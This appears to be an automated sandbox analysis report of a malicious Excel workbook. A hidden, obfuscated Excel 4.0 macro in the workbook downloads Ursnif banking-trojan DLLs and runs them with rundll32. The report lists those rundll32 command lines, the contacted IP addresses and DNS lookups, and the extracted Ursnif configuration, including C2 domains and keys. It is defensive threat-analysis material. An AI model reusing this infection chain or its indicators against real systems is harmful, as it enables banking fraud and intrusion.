Loading ...

Play interactive tourEdit tour

Analysis Report FED8GODpaD

Overview

General Information

Sample Name:FED8GODpaD (renamed file extension from none to xlsb)
Analysis ID:383044
MD5:889194eb6a3904f14ab7ffd672c97ad5
SHA1:983b743e8d66666d2262fe6f6d21c9950ea64bdc
SHA256:a80382d030b0c292a73e83cdcbd0f4e30f43f43bd7d2e3250dcf83e1d2d51503
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 3544 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 1536 cmdline: rundll32 ..\fikftkm.thj,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3636 cmdline: rundll32 ..\fikftkm.thj1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1528 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3888 cmdline: rundll32 ..\fikftkm.thj3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4772 cmdline: rundll32 ..\fikftkm.thj4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.rundll32.exe.34d0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 4.3.rundll32.exe.56394a0.0.raw.unpackMalware Configuration Extractor: Ursnif [{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\fikftkm.thj1Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknownHTTPS traffic detected: 108.167.180.111:443 -> 192.168.2.3:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.152.162:443 -> 192.168.2.3:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.229.135.209:443 -> 192.168.2.3:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.3:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.116.95.68:443 -> 192.168.2.3:49717 version: TLS 1.2

        Software Vulnerabilities:

        barindex
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 0504[1].gif.1.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
        Source: global trafficDNS query: name: ethereality.info
        Source: global trafficTCP traffic: 192.168.2.3:49709 -> 108.167.180.111:443
        Source: global trafficTCP traffic: 192.168.2.3:49709 -> 108.167.180.111:443
        Source: Joe Sandbox ViewIP Address: 5.100.155.169 5.100.155.169
        Source: Joe Sandbox ViewIP Address: 5.100.152.162 5.100.152.162
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS traffic detected: queries for: ethereality.info
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.aadrm.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.cortana.ai
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.office.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.onedrive.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://augloop.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://augloop.office.com/v2
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cdn.entity.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://clients.config.office.net/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://config.edge.skype.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cortana.ai
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cortana.ai/api
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://cr.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dev.cortana.ai
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://devnull.onenote.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://directory.services.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://graph.windows.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://graph.windows.net/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://lifecycle.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://login.windows.local
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://management.azure.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://management.azure.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://messaging.office.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ncus.contentsync.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://officeapps.live.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://onedrive.live.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://outlook.office.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://outlook.office365.com/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://powerlift.acompli.net
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://settings.outlook.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://staging.cortana.ai
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://tasks.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://webshell.suite.office.com
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://wus2.contentsync.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 4103334B-074A-4597-8653-04BC9F5588EA.1.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownHTTPS traffic detected: 108.167.180.111:443 -> 192.168.2.3:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.152.162:443 -> 192.168.2.3:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.229.135.209:443 -> 192.168.2.3:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.3:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.116.95.68:443 -> 192.168.2.3:49717 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.34d0000.2.raw.unpack, type: UNPACKEDPE

        E-Banking Fraud:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.34d0000.2.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: Enable Editing, pk --- The specified module could not befoul-id. ,, , 13_ from the yellow bar above
        Source: Screenshot number: 8Screenshot OCR: Enable Editing, pk O There was a problem starting ,,\fikftkm.thj3 ,, , 13_ from the yellow bar abov
        Found Excel 4.0 Macro with suspicious formulasShow sources
        Source: FED8GODpaD.xlsbInitial sample: EXEC
        Source: FED8GODpaD.xlsbInitial sample: CALL
        Found abnormal large hidden Excel 4.0 Macro sheetShow sources
        Source: FED8GODpaD.xlsbInitial sample: Sheet size: 21162
        Source: FED8GODpaD.xlsbInitial sample: Sheet size: 10013
        Found obfuscated Excel 4.0 MacroShow sources
        Source: FED8GODpaD.xlsbInitial sample: High usage of CHAR() function: 40
        Office process drops PE fileShow sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@11/11@5/5
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{99308FCD-F966-4E77-91B4-5E5998C05800} - OProcSessId.datJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
